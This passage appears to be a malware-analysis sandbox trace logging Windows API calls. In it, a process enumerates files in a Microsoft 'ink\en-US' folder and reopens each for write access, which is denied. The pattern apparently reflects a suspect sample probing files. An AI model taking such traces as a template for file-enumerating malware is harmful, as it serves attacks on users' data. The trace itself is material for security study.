(HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0098.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0098.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0098.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0098.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.906] AreFileApisANSI () returned 1 [0098.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", lpUsedDefaultChar=0x0) returned 80 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0098.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0098.907] AreFileApisANSI () returned 1 [0098.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0098.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0098.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8cf80, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 80 [0098.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.907] GetFileType (hFile=0x418) returned 0x1 [0098.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0098.907] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.907] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.908] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.908] CloseHandle (hObject=0x418) returned 1 [0098.908] AreFileApisANSI () returned 1 [0098.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0098.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0098.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 80 [0098.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.908] GetLastError () returned 0x5 [0098.908] GetLastError () returned 0x5 [0098.908] SetLastError (dwErrCode=0x5) [0098.908] GetLastError () returned 0x5 [0098.908] SetLastError (dwErrCode=0x5) [0098.908] GetLastError () returned 0x5 [0098.908] SetLastError (dwErrCode=0x5) [0098.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0098.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0098.908] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.909] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da18a06, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x80b88a00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="IpsMigrationPlugin.dll.mui", cAlternateFileName="")) returned 1 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68fe0 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68fe0 | out: hHeap=0x20000) returned 1 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0098.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0098.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0098.910] AreFileApisANSI () returned 1 [0098.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", lpUsedDefaultChar=0x0) returned 84 [0098.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0098.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.910] AreFileApisANSI () returned 1 [0098.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0098.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5ef58 [0098.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x5ef58, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 84 [0098.910] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.910] GetFileType (hFile=0x418) returned 0x1 [0098.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0098.910] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.911] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.911] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.911] CloseHandle (hObject=0x418) returned 1 [0098.911] AreFileApisANSI () returned 1 [0098.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0098.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f428 [0098.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 84 [0098.911] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.911] GetLastError () returned 0x5 [0098.911] GetLastError () returned 0x5 [0098.911] SetLastError (dwErrCode=0x5) [0098.911] GetLastError () returned 0x5 [0098.911] SetLastError (dwErrCode=0x5) [0098.911] GetLastError () returned 0x5 [0098.911] SetLastError (dwErrCode=0x5) [0098.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0098.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.912] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a1d507, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1af9c24, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1af9c24, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x30d3a, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="join.avi", cAlternateFileName="")) returned 1 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0098.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.913] AreFileApisANSI () returned 1 [0098.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi", lpUsedDefaultChar=0x0) returned 66 [0098.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0098.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.913] AreFileApisANSI () returned 1 [0098.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0098.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82b08 [0098.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x82b08, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 66 [0098.913] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.913] GetFileType (hFile=0x418) returned 0x1 [0098.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b08 | out: hHeap=0x20000) returned 1 [0098.913] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.914] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.914] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.914] CloseHandle (hObject=0x418) returned 1 [0098.914] AreFileApisANSI () returned 1 [0098.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0098.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82328 [0098.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x82328, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 66 [0098.914] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.914] GetLastError () returned 0x5 [0098.914] GetLastError () returned 0x5 [0098.914] SetLastError (dwErrCode=0x5) [0098.914] GetLastError () returned 0x5 [0098.914] SetLastError (dwErrCode=0x5) [0098.914] GetLastError () returned 0x5 [0098.915] SetLastError (dwErrCode=0x5) [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82328 | out: hHeap=0x20000) returned 1 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0098.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.915] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2400, 